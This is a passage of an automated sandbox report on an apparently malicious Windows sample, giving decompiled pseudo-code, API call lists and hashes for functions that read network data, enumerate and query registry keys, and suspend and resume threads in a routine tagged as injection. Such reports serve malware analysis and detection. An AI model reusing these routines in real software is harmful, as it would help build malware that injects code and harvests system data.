                              0x013e5b69
                              0x013e5b70
                              0x013e5b75
                              0x013e5b77
                              0x013e5b7d
                              0x013e5ba5
                              0x013e5bbd
                              0x013e5bbf
                              0x013e5bc0
                              0x013e5bc2
                              0x013e5c00
                              0x013e5c00
                              0x013e5c06
                              0x013e5c0c
                              0x013e5c0c
                              0x013e5bc4
                              0x013e5bca
                              0x013e5bcd
                              0x013e5bdc
                              0x013e5bde
                              0x013e5be5
                              0x013e5c19
                              0x013e5c1e
                              0x013e5c20
                              0x013e5c22
                              0x013e5c22
                              0x00000000
                              0x013e5c20
                              0x013e5be7
                              0x013e5bec
                              0x013e5bfa
                              0x00000000
                              0x013e5bfa
                              0x013e5bb4
                              0x013e5bb9
                              0x013e5bb9
                              0x00000000
                              0x013e5bb9
                              0x013e5b87
                              0x00000000
                              0x00000000
                              0x013e5b96
                              0x00000000

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 013E5B7F
                                • Part of subcall function 013E7132: GetTickCount.KERNEL32 ref: 013E7146
                                • Part of subcall function 013E7132: wsprintfA.USER32 ref: 013E7196
                                • Part of subcall function 013E7132: wsprintfA.USER32 ref: 013E71B3
                                • Part of subcall function 013E7132: wsprintfA.USER32 ref: 013E71DF
                                • Part of subcall function 013E7132: HeapFree.KERNEL32(00000000,?), ref: 013E71F1
                                • Part of subcall function 013E7132: wsprintfA.USER32 ref: 013E7212
                                • Part of subcall function 013E7132: HeapFree.KERNEL32(00000000,?), ref: 013E7222
                                • Part of subcall function 013E7132: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 013E7250
                                • Part of subcall function 013E7132: GetTickCount.KERNEL32 ref: 013E7261
                              • RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 013E5B9D
                              • HeapFree.KERNEL32(00000000,?,?,?,013E512B,00000002,?,?,?,?), ref: 013E5BFA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Heap$wsprintf$AllocateFree$CountTick
                              • String ID: Uxt
                              • API String ID: 1676223858-1536154274
                              • Opcode ID: 7109a71acfd91867eb2ff9879b58e0de9dcb24a01adb76fa46e7107a7885228d
                              • Instruction ID: 3562fc380de6f465658d670133cf404f5f33f22f318890cdab436307eb46858e
                              • Opcode Fuzzy Hash: 7109a71acfd91867eb2ff9879b58e0de9dcb24a01adb76fa46e7107a7885228d
                              • Instruction Fuzzy Hash: DC2130BA21132AAFDF619F98D948F9A3BFDAB49358F000025F901DB1C0D770E901CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E4788, Relevance: 6.1, APIs: 4, Instructions: 120synchronizationCOMMON
                              Download Yara Rule
                              C-Code - Quality: 62%
                              			E013E4788(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				void* _t46;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				long _t54;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78); // executed
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_t46 =  *0x13ed130(0, 1,  &_v24); // executed
							if(_t46 != 0) {
								_v8 = 8;
							} else {
								_t47 = E013E55DC(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0x13ed2a4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55); // executed
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E013E6DFA(_v20);
											if(_v8 == 0) {
												_t54 = E013E44E4(_v24, _t74); // executed
												_v8 = _t54;
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E013E301A(__eax); // executed
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}



























                              0x013e4789
                              0x013e478f
                              0x013e479a
                              0x013e479a
                              0x013e479c
                              0x013e8a1b
                              0x013e8a1e
                              0x013e8a27
                              0x013e8a2a
                              0x013e8a2d
                              0x013e8a35
                              0x013e8b33
                              0x013e8b3e
                              0x013e8b41
                              0x013e8b43
                              0x00000000
                              0x013e8b43
                              0x013e8a3b
                              0x013e8a3e
                              0x013e8b46
                              0x013e8b46
                              0x013e8a44
                              0x013e8a4b
                              0x013e8a53
                              0x013e8b2a
                              0x013e8a59
                              0x013e8a5f
                              0x013e8a66
                              0x013e8a69
                              0x013e8b18
                              0x013e8a6f
                              0x00000000
                              0x013e8a6f
                              0x013e8a6f
                              0x013e8a6f
                              0x013e8a6f
                              0x013e8a74
                              0x013e8a76
                              0x013e8a76
                              0x013e8a83
                              0x013e8a8b
                              0x00000000
                              0x00000000
                              0x013e8a8d
                              0x013e8a9a
                              0x013e8aa0
                              0x013e8aa0
                              0x013e8aa3
                              0x00000000
                              0x00000000
                              0x013e8aa5
                              0x013e8ab0
                              0x013e8ac4
                              0x013e8afa
                              0x013e8ac6
                              0x013e8ac6
                              0x013e8acd
                              0x013e8ad5
                              0x00000000
                              0x013e8ad7
                              0x013e8ad7
                              0x013e8ae2
                              0x013e8ae5
                              0x013e8aec
                              0x00000000
                              0x013e8aec
                              0x013e8ae5
                              0x013e8ad5
                              0x013e8afd
                              0x013e8b00
                              0x013e8b08
                              0x013e8b0e
                              0x013e8b13
                              0x013e8b13
                              0x00000000
                              0x013e8b08
                              0x013e8aad
                              0x00000000
                              0x013e8aef
                              0x013e8aef
                              0x00000000
                              0x013e8af8
                              0x013e8b1f
                              0x013e8b1f
                              0x013e8b25
                              0x013e8b25
                              0x013e8a53
                              0x013e8a3e
                              0x013e8b50
                              0x013e4791
                              0x013e4791
                              0x013e4798
                              0x013e47a3
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013e4798

                              APIs
                              • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,74785520,013E654E,?,?), ref: 013E8AB7
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,74785520,013E654E,?,?,?), ref: 013E8AD7
                                • Part of subcall function 013E301A: wcstombs.NTDLL ref: 013E30DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: ErrorLastObjectSingleWaitwcstombs
                              • String ID:
                              • API String ID: 2344289193-0
                              • Opcode ID: 9de10da8eb8079a1c21a57b22153a3d9f571e0386eeff76d19197cca8f9fe284
                              • Instruction ID: f6ec284796252a4ed9d4b5f999eabea3c11a856f79275fe447aee763af0fc04b
                              • Opcode Fuzzy Hash: 9de10da8eb8079a1c21a57b22153a3d9f571e0386eeff76d19197cca8f9fe284
                              • Instruction Fuzzy Hash: 6141ECB1D00329EFEF219FA9D9885AEBBF9FF04349F1044A9E502E6191D7709E409B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01022520, Relevance: 6.1, APIs: 4, Instructions: 108threadsynchronizationinjectionCOMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 0102254E
                              • ResumeThread.KERNELBASE(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 010225D8
                              • WaitForSingleObject.KERNEL32(00000064), ref: 010225E6
                              • SuspendThread.KERNELBASE(?), ref: 010225F9
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                              • String ID:
                              • API String ID: 3168247402-0
                              • Opcode ID: f485c2abde47a29d02a11986309d502a69bebbf0d46cb90fbd9dc05a1edc5640
                              • Instruction ID: c47b885d2089200796cdf585dcadab6171145d7cdbda72e34b18d52499a10077
                              • Opcode Fuzzy Hash: f485c2abde47a29d02a11986309d502a69bebbf0d46cb90fbd9dc05a1edc5640
                              • Instruction Fuzzy Hash: DC418072104302AFE721DF94C984E6BBBE9FF88354F14492DFAD482164D772D954CB52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013EA614, Relevance: 6.1, APIs: 4, Instructions: 98registrysynchronizationCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E013EA614(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E013E55DC(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32);
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E013E6DFA(_v28);
							goto L17;
						}
						_t42 = E013E48E5(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E013E6DFA(_v24);
						_v20 = _v16;
						_t47 = E013E55DC(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x13ed2a4, 0) == 0x102);
				goto L16;
			}

















                              0x013ea614
                              0x013ea62e
                              0x013ea631
                              0x013ea634
                              0x013ea637
                              0x013ea63a
                              0x013ea640
                              0x013ea644
                              0x013ea71e
                              0x013ea722
                              0x013ea722
                              0x013ea64d
                              0x013ea654
                              0x013ea65b
                              0x013ea65e
                              0x013ea713
                              0x013ea716
                              0x00000000
                              0x013ea71c
                              0x013ea664
                              0x013ea667
                              0x013ea66e
                              0x013ea678
                              0x013ea681
                              0x013ea687
                              0x013ea68f
                              0x013ea6c7
                              0x013ea701
                              0x013ea707
                              0x013ea709
                              0x013ea709
                              0x013ea70b
                              0x013ea70e
                              0x00000000
                              0x013ea70e
                              0x013ea6dc
                              0x013ea6e1
                              0x013ea6e5
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013ea6e5
                              0x013ea694
                              0x013ea6a3
                              0x00000000
                              0x00000000
                              0x013ea6a8
                              0x013ea6b1
                              0x013ea6b4
                              0x013ea6bb
                              0x013ea6be
                              0x013ea699
                              0x013ea699
                              0x00000000
                              0x013ea699
                              0x013ea6c2
                              0x00000000
                              0x013ea6c2
                              0x013ea696
                              0x00000000
                              0x013ea6e7
                              0x013ea6f4
                              0x00000000

                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,013E6096,?), ref: 013EA63A
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • RegEnumKeyExA.KERNELBASE(?,?,?,013E6096,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,013E6096), ref: 013EA681
                              • WaitForSingleObject.KERNEL32(00000000,?,?,?,013E6096,?,013E6096,?,?,?,?,?,013E6096,?), ref: 013EA6EE
                              • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,013E6096,?), ref: 013EA716
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                              • String ID:
                              • API String ID: 3664505660-0
                              • Opcode ID: 68566d74065b2ee22f150eddd136fb16ddbe94f561bb7d8abdf109b0dd23060d
                              • Instruction ID: cae593e805ca4cc97933bafd191eec63fe2f5b0a04c9566fb713a99710899197
                              • Opcode Fuzzy Hash: 68566d74065b2ee22f150eddd136fb16ddbe94f561bb7d8abdf109b0dd23060d
                              • Instruction Fuzzy Hash: 22311976C40229EBCF22ABD98C889EEFFF9EB94358F104026E512B7190D6714A40DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E6A4D, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                              Download Yara Rule
                              APIs
                              • SysAllocString.OLEAUT32(80000002), ref: 013E6AA4
                              • SysAllocString.OLEAUT32(013E4993), ref: 013E6AE7
                              • SysFreeString.OLEAUT32(00000000), ref: 013E6AFB
                              • SysFreeString.OLEAUT32(00000000), ref: 013E6B09
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: String$AllocFree
                              • String ID:
                              • API String ID: 344208780-0
                              • Opcode ID: 92e7f83acebc3b27d6e397a2e1a7c0b340ba4c1e057e0632e00b064400b0247e
                              • Instruction ID: 502d50a266e49fa7c836ff977d555754b047c5e10be9cc02172804b10cf0ad71
                              • Opcode Fuzzy Hash: 92e7f83acebc3b27d6e397a2e1a7c0b340ba4c1e057e0632e00b064400b0247e
                              • Instruction Fuzzy Hash: B4314DB190020AEFCB15CF99C8D58AE7FF9BF58344F10842EE50A9B290D7719545CF61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E6006, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                              Download Yara Rule
                              C-Code - Quality: 41%
                              			E013E6006(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E013E2E2E(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E013EA2A1(_t23);
						}
					}
					return _t38;
				}
				_t26 = E013E5EF5(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x13ed2e4, 1, 0,  *0x13ed374);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E013EA614(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E013E48E5(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E013E7424(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E013E4B5B( &_v32, _t39);
					goto L13;
				}
			}














                              0x013e6006
                              0x013e6013
                              0x013e6019
                              0x013e601a
                              0x013e601b
                              0x013e601c
                              0x013e601d
                              0x013e6021
                              0x013e6028
                              0x013e602d
                              0x013e6031
                              0x013e60b9
                              0x013e60b9
                              0x013e60bc
                              0x013e60be
                              0x013e60c6
                              0x013e60cc
                              0x013e60cf
                              0x013e60cf
                              0x013e60cc
                              0x013e60da
                              0x013e60da
                              0x013e603d
                              0x013e6044
                              0x013e6046
                              0x013e6046
                              0x013e605d
                              0x013e6061
                              0x013e6064
                              0x013e606f
                              0x013e6076
                              0x013e6076
                              0x013e6082
                              0x013e6083
                              0x013e6091
                              0x013e6085
                              0x013e6085
                              0x013e6086
                              0x013e6087
                              0x013e6088
                              0x013e6089
                              0x013e608a
                              0x013e608a
                              0x013e6096
                              0x013e609b
                              0x013e609d
                              0x013e609f
                              0x013e609f
                              0x013e60a6
                              0x00000000
                              0x013e60a8
                              0x013e60a8
                              0x013e60b5
                              0x00000000
                              0x013e60b5

                              APIs
                              • CreateEventA.KERNEL32(013ED2E4,00000001,00000000,00000040,?,?,747DF710,00000000,747DF730), ref: 013E6057
                              • SetEvent.KERNEL32(00000000), ref: 013E6064
                              • Sleep.KERNEL32(00000BB8), ref: 013E606F
                              • CloseHandle.KERNEL32(00000000), ref: 013E6076
                                • Part of subcall function 013EA614: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,013E6096,?), ref: 013EA63A
                                • Part of subcall function 013EA614: RegEnumKeyExA.KERNELBASE(?,?,?,013E6096,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,013E6096), ref: 013EA681
                                • Part of subcall function 013EA614: WaitForSingleObject.KERNEL32(00000000,?,?,?,013E6096,?,013E6096,?,?,?,?,?,013E6096,?), ref: 013EA6EE
                                • Part of subcall function 013EA614: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,013E6096,?), ref: 013EA716
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                              • String ID:
                              • API String ID: 891522397-0
                              • Opcode ID: 5e017c30b072b192fd01c87ebb30cb73bb0378c3a6fa63a9a540871909e8aa06
                              • Instruction ID: 96cd7021daf0f8ea94b21542adff73b10cc6de2641d6ce616bdaf60e5958395d
                              • Opcode Fuzzy Hash: 5e017c30b072b192fd01c87ebb30cb73bb0378c3a6fa63a9a540871909e8aa06
                              • Instruction Fuzzy Hash: 1521C4B2900339ABCF30AFEC888989E7FFDAB54258F004029EB11A7180D7359D018BA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E5607, Relevance: 6.1, APIs: 4, Instructions: 80registryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E013E5607(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E013E55DC(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E013E6DFA(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12);
					}
					L12:
					return _t43;
				}
				_t43 = E013E8FEC(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}







                              0x013e5613
                              0x013e5636
                              0x013e5640
                              0x013e5646
                              0x013e564a
                              0x013e5662
                              0x013e5667
                              0x013e56af
                              0x013e5669
                              0x013e5671
                              0x013e5675
                              0x013e56ac
                              0x013e5677
                              0x013e5689
                              0x013e568d
                              0x013e56a3
                              0x013e568f
                              0x013e5692
                              0x013e5694
                              0x013e5699
                              0x013e569e
                              0x013e569e
                              0x013e5699
                              0x013e568d
                              0x013e5675
                              0x013e56b7
                              0x013e56b7
                              0x013e56be
                              0x013e56c4
                              0x013e56c4
                              0x013e562c
                              0x013e5630
                              0x00000000
                              0x00000000
                              0x00000000

                              APIs
                              • RegOpenKeyW.ADVAPI32(80000002,03AD9C46,03AD9C46), ref: 013E5640
                              • RegQueryValueExW.KERNELBASE(03AD9C46,?,00000000,80000002,00000000,00000000,?,013E49C4,3D013EC0,80000002,013E6096,00000000,013E6096,?,03AD9C46,80000002), ref: 013E5662
                              • RegQueryValueExW.ADVAPI32(03AD9C46,?,00000000,80000002,00000000,00000000,00000000,?,013E49C4,3D013EC0,80000002,013E6096,00000000,013E6096,?,03AD9C46), ref: 013E5687
                              • RegCloseKey.ADVAPI32(03AD9C46,?,013E49C4,3D013EC0,80000002,013E6096,00000000,013E6096,?,03AD9C46,80000002,00000000,?), ref: 013E56B7
                                • Part of subcall function 013E8FEC: SafeArrayDestroy.OLEAUT32(00000000), ref: 013E9071
                                • Part of subcall function 013E6DFA: RtlFreeHeap.NTDLL(00000000,00000000,013E55CD,00000000,?,?,00000000), ref: 013E6E06
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                              • String ID:
                              • API String ID: 486277218-0
                              • Opcode ID: f80040c795dc3a688f66f0db1d3891cfbcda62c15a43a9299264c2def80cb84b
                              • Instruction ID: 29e691cfe47f4ef48a4522b0c261e8c7f8b2f24518e21edc8544f53e8366f059
                              • Opcode Fuzzy Hash: f80040c795dc3a688f66f0db1d3891cfbcda62c15a43a9299264c2def80cb84b
                              • Instruction Fuzzy Hash: F5213E7650022EBFDF21AE98EC84CEE7BADFB14268B044025FE159B190D7319D61DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01041F4C, Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON
                              Download Yara Rule
                              APIs
                              • RegQueryValueExA.KERNELBASE(?,00000000,00000000,?,00000000,?,?,?,?,?,?,0103D0D4,80000001,?,?,80000001), ref: 01041F71
                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 01041F88
                              • HeapFree.KERNEL32(00000000,00000000,?,0103D0D4,80000001,?,?,80000001,?,?,00000000,?,?,?,01022E53,80000001), ref: 01041FA3
                              • RegQueryValueExA.KERNELBASE(?,00000000,00000000,?,00000000,?,?,0103D0D4,80000001,?,?,80000001,?,?,00000000), ref: 01041FC2
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HeapQueryValue$AllocateFree
                              • String ID:
                              • API String ID: 4267586637-0
                              • Opcode ID: 88e513210f61a0ee0a9cd00e5dc3191630b28e06ce9f74d9f7843a2498977c39
                              • Instruction ID: e4a959d79fbc6e599685c60d5804e5a7365c885419656f4009662c69d8326951
                              • Opcode Fuzzy Hash: 88e513210f61a0ee0a9cd00e5dc3191630b28e06ce9f74d9f7843a2498977c39
                              • Instruction Fuzzy Hash: 6C113DBA900218FFDB229F98DD84CEEBBBDEB89350B104066F94593114D3716E91DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01039288, Relevance: 6.0, APIs: 4, Instructions: 42stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,010501F4,00000000,0102B176,?,0102145C,?), ref: 010392A7
                              • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,010501F4,00000000,0102B176,?,0102145C,?), ref: 010392B2
                              • _wcsupr.NTDLL ref: 010392BF
                              • lstrlenW.KERNEL32(00000000), ref: 010392C7
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                              • String ID:
                              • API String ID: 2533608484-0
                              • Opcode ID: 435c0b25d7d1bd035fb6902f29107c3587debfbe53bc72708cc2b9d128de2b0a
                              • Instruction ID: 934d851982c91c1aec4201edcd242234c0225ba009175344699846d3f0af5a2a
                              • Opcode Fuzzy Hash: 435c0b25d7d1bd035fb6902f29107c3587debfbe53bc72708cc2b9d128de2b0a
                              • Instruction Fuzzy Hash: 3AF050756015216BA3226A395CC8DAF76DCABD1B547100538F9C1C2004CF59CC0043A4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01025270, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              • InterlockedIncrement.KERNEL32(010500BC), ref: 01025285
                                • Part of subcall function 0103D9F4: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0103DA1F
                                • Part of subcall function 0103D9F4: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0103DA2C
                                • Part of subcall function 0103D9F4: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 0103DAB8
                                • Part of subcall function 0103D9F4: GetModuleHandleA.KERNEL32(00000000), ref: 0103DAC3
                                • Part of subcall function 0103D9F4: RtlImageNtHeader.NTDLL(00000000), ref: 0103DACC
                                • Part of subcall function 0103D9F4: RtlExitUserThread.NTDLL(00000000), ref: 0103DAE1
                              • InterlockedDecrement.KERNEL32(010500BC), ref: 010252A9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                              • String ID: t
                              • API String ID: 1011034841-2238339752
                              • Opcode ID: 95cce36326a1e84b5cfdf86b2bed11e8dcf8cd9ff6f49c5e48a4a08dde1a4c6b
                              • Instruction ID: 6f96dfb147d7b356537612f97c051e5b4467849265216927be314e2cf49175d5
                              • Opcode Fuzzy Hash: 95cce36326a1e84b5cfdf86b2bed11e8dcf8cd9ff6f49c5e48a4a08dde1a4c6b
